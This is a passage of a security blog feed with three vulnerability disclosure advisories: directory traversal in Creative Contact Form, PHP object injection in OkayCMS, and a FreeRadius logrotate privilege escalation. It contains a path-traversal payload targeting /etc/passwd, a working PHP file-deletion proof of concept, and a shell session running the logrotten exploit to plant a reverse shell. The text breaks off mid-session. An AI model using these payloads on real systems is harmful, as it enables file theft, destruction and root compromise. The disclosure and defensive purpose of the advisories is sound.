CVE https://tech.feedyourhead.at/ en Creative Contact Form: Directory Traversal (CVE-2020-9364) https://tech.feedyourhead.at/content/creative-contact-form-directory-traversal-cve-2020-9364 <span class="field field--name-title field--type-string field--label-hidden">Creative Contact Form: Directory Traversal (CVE-2020-9364)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20200301-01<br /> Target: Creative Contact Form (for Joomla)<br /> Vendor: Creative Solutions<br /> Version: 4.6.2 (before Dec 03 2019)<br /> CVE: CVE-2020-9364<br /> Accessibility: Remote<br /> Severity: High<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h3>Summary</h3> <p>Creative Contact Form is a responsive jQuery contact form for the Joomla content-management-system.</p> <h3>Vulnerability Description</h3> <p>A directory traversal vulnerability resides inside the mailer component of the Creative Contact Form for Joomla. An attacker could exploit this vulnerability to receive any files from the server via e-mail.</p> <p><em>The vulnerable code is located in "helpers/mailer.php" at line 290:</em></p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">&nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/isset"><span style="color: #990000;">isset</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'creativecontactform_upload'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/is_array"><span style="color: #990000;">is_array</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'creativecontactform_upload'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">foreach</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'creativecontactform_upload'</span><span style="color: #009900;">&#93;</span> <span style="color: #b1b100;">as</span> <span style="color: #000088;">$file</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> &nbsp; <span style="color: #666666; font-style: italic;">// echo $file.'--';</span> <span style="color: #000088;">$file_path</span> <span style="color: #339933;">=</span> JPATH_BASE <span style="color: #339933;">.</span> <span style="color: #0000ff;">'/components/com_creativecontactform/views/creativeupload/files/'</span><span style="color: #339933;">.</span><span style="color: #000088;">$file</span><span style="color: #339933;">;</span> <span style="color: #000088;">$attach_files</span><span style="color: #009900;">&#91;</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$file_path</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span></pre></div> <p>If an attacker puts "../../../../../../../../etc/passwd" into $_POST['creativecontactform_upload'], and enables "Send me a copy", the contact-form would send him the content of /etc/passwd via email.</p> <p><em>Note: this vulnerability might not be exploitable in the free version of Creative Contact Form since it does not allow "Send copy to sender".</em></p> <h3>Vulnerable Versions</h3> <p>Creative Contact Form Personal/Professional/Business 4.6.2 (before Dec 3 2019)</p> <h3>Impact</h3> <p>An unauthenticated attacker could receive any file from the server.</p> <h3>Solution</h3> <p>Update to the current version</p> <h3>References</h3> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-9364" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2020-9364</a></li> <li><a href="https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form">https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form</a> </li> </ul> <h3>Vendor Contact Timeline</h3> <table class="ce-table" height="89" width="320"> <tbody> <tr> <td>2019-12-02</td> <td>Contacting the vendor</td> </tr> <tr> <td>2019-12-02</td> <td>Vendor published a fixed version</td> </tr> <tr> <td>2019-03-01</td> <td> <p>Public disclosure</p> </td> </tr> </tbody> </table> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Mar 09 2020</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=288&amp;2=comment&amp;3=comment" token="KATz-0qhu3m_m_g-UdRFMB2mTDlft3WPIaKRQiTlynQ"></drupal-render-placeholder> </section> Mon, 09 Mar 2020 20:59:44 +0000 Hoti 288 at https://tech.feedyourhead.at OkayCMS: Unauthenticated remote code execution https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms <span class="field field--name-title field--type-string field--label-hidden">OkayCMS: Unauthenticated remote code execution</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20191129-01<br /> Target: OkayCMS<br /> Vendor: OkayCMS<br /> Version: all versions including 2.3.4<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16885">CVE-2019-16885</a><br /> Accessibility: Local<br /> Severity: Critical<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://okay-cms.com/">OkayCMS is a simple and functional content managment system for an online store.</a></p> <h4>Vulnerability Description</h4> <p>An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in “<em>view/ProductsView.php</em>” using the cookie "price_filter" or in “<em>api/Comparison.php</em>” via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in “<em>api/Comparison.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$items</span> <span style="color: #339933;">=</span> <span style="color: #339933;">!</span><a href="http://www.php.net/empty"><span style="color: #990000;">empty</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> ? <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> <a href="http://www.php.net/array"><span style="color: #990000;">array</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <p>The unsafe deserialization also occurs in “<em>view/ProductsView.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$price_filter</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'price_filter'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <h4>Proof of Concept</h4> <p>The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$argc</span> <span style="color: #339933;">!=</span> <span style="color: #cc66cc;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <span style="color: #0000ff;">&quot;usage: <span style="color: #006699; font-weight: bold;">$argv[0]</span> &lt;url&gt; &lt;file&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/exit"><span style="color: #990000;">exit</span></a><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$url</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_CacheResource_File <span style="color: #009900;">&#123;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> releaseLock<span style="color: #009900;">&#40;</span>Smarty <span style="color: #000088;">$smarty</span><span style="color: #339933;">,</span> Smarty_Template_Cached <span style="color: #000088;">$cached</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">false</span><span style="color: #339933;">;</span> <span style="color: #339933;">@</span><a href="http://www.php.net/unlink"><span style="color: #990000;">unlink</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Template_Cached <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$handler</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$lock_id</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;&quot;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$GLOBALS</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_CacheResource_File<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cache_locking</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_Template <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$smarty</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cached</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty<span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Template_Cached<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __destruct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cache_locking</span> <span style="color: #339933;">&amp;&amp;</span> <a href="http://www.php.net/isset"><span style="color: #990000;">isset</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">releaseLock</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">,</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$obj</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_Template<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$serialized</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/serialize"><span style="color: #990000;">serialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$obj</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$un</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$headers</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span> <span style="color: #0000ff;">'Accept-Language: en-US,en;q=0.5'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;Referer: <span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'Cookie: '</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">'price_filter='</span> <span style="color: #339933;">.</span> <a href="http://www.php.net/urlencode"><span style="color: #990000;">urlencode</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">';'</span> <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$curl</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_init"><span style="color: #990000;">curl_init</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/curl_setopt_array"><span style="color: #990000;">curl_setopt_array</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #339933;">,</span> <span style="color: #009900;">&#91;</span> CURLOPT_HTTPHEADER <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$headers</span><span style="color: #339933;">,</span> CURLOPT_RETURNTRANSFER <span style="color: #339933;">=&gt;</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">,</span> CURLOPT_URL <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">&quot;<span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki/sort-price&quot;</span><span style="color: #339933;">,</span> CURLOPT_USERAGENT <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'</span> <span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$resp</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_exec"><span style="color: #990000;">curl_exec</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.php.net/curl_close"><span style="color: #990000;">curl_close</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">print</span> <span style="color: #000088;">$resp</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div> <h4>Notes</h4> <p>Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.</p> <h4>Vulnerable Versions</h4> <p>All versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.</p> <h4>Tested Versions</h4> <p>OkayCMS-Lite 2.3.4</p> <h4>Impact</h4> <p>An unauthenticated attacker could upload a webshell to the server and execute commands remotely.</p> <h4>Mitigation</h4> <p>At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.</p> <h4>Vendor Contact Timeline</h4> <p>2019-08-29Contacting the vendor</p> <p>2019-09-04Vendor replied</p> <p>2019-09-17Vendor released commercial version 3.0.2 including a bugfix</p> <p>2019-09-29Public disclosure</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms">https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=284&amp;2=comment&amp;3=comment" token="GjVmaskhE-AMvP5dALObfK4_-KKa7f-L1OICRNPKZFg"></drupal-render-placeholder> </section> Mon, 02 Dec 2019 18:25:19 +0000 Hoti 284 at https://tech.feedyourhead.at FreeRadius: Privilege Escalation via Logrotate https://tech.feedyourhead.at/content/privilege-escalation-via-logrotate-freeradius <span class="field field--name-title field--type-string field--label-hidden">FreeRadius: Privilege Escalation via Logrotate</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h2>Identifier: AIT-SA-20191112-01</h2> <p>Target: FreeRadius<br /> Vendor: FreeRadius<br /> Version: all versions including 3.0.19<br /> Fixed in Version: 12.2.3, 12.1.8 and 12.0.8<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">CVE-2019-10143</a><br /> Accessibility: Local<br /> Severity: Low<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://freeradius.org/">FreeRadius is a modular Open-Source RADIUS suite.</a></p> <h4>Vulnerability Description</h4> <p>The ownership of the logdirectory “radacct” belongs to user "radiusd". User “radiusd” can elevate the privileges to “root” because of an unsafe interaction with logrotate.<br /> User “radiusd” owns the log directory /<em>var/log/radius/radacct:</em></p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; drwx------. <span style="color: #000000;">3</span> radiusd radiusd <span style="color: #000000;">4096</span> <span style="color: #000000;">26</span>. Apr <span style="color: #000000;">16</span>:01 <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span> </pre></div> <p>Log files rotate once a day(or any other frequency if configured) by logrotate as user root. The configuration does not use the “su” directive:</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/*/</span>detail <span style="color: #7a0874; font-weight: bold;">&#123;</span> monthly rotate <span style="color: #000000;">4</span> nocreate missingok compress <span style="color: #7a0874; font-weight: bold;">&#125;</span></pre></div></p> <p>Since logrotate is prone to a race-condition(see <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>) it is possible for user "radiusd" to replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory(for example /etc/bash_completion.d). logrotate will place the compressed files AS ROOT into /etc/bash_completition.d and set the owner and group to "radiusd.radiusd". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then.</p> <p>Details of the race-condition in logrotate can be found at:</p> <ul> <li><a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a></li> <li><a href="https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges">https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges</a></li> <li><a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></li> </ul> <h4>Proof of Concept</h4> <p>The following example illustrates how an attacker who already gained a shell as user “radiusd”, can elevate his privileges to “root”. After downloading and compiling, the exploit gets executed and waits until the next daily run of logrotate.&nbsp; If the rotation of the log file succeeds, a new file that contains the reverse shell payload, will be written into /etc/bash_completition.d/ with owner “radiusd”. As soon as root logs in, the reverse shell gets executed and opens a shell on the attackers netcat listener:</p> <p>&nbsp;</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">git clone</span> https:<span style="color: #000000; font-weight: bold;">//</span>github.com<span style="color: #000000; font-weight: bold;">/</span>whotwagner<span style="color: #000000; font-weight: bold;">/</span>logrotten.git <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten Cloning into <span style="color: #ff0000;">'/tmp/logrotten'</span>... remote: Enumerating objects: <span style="color: #000000;">84</span>, done. remote: Counting objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Compressing objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">58</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">58</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Total <span style="color: #000000;">84</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">35</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, reused <span style="color: #000000;">64</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">24</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, pack-reused <span style="color: #000000;">0</span> Unpacking objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #660033;">-p</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">touch</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">gcc</span> <span style="color: #660033;">-o</span> logrotten logrotten.c radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-c</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span> radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: 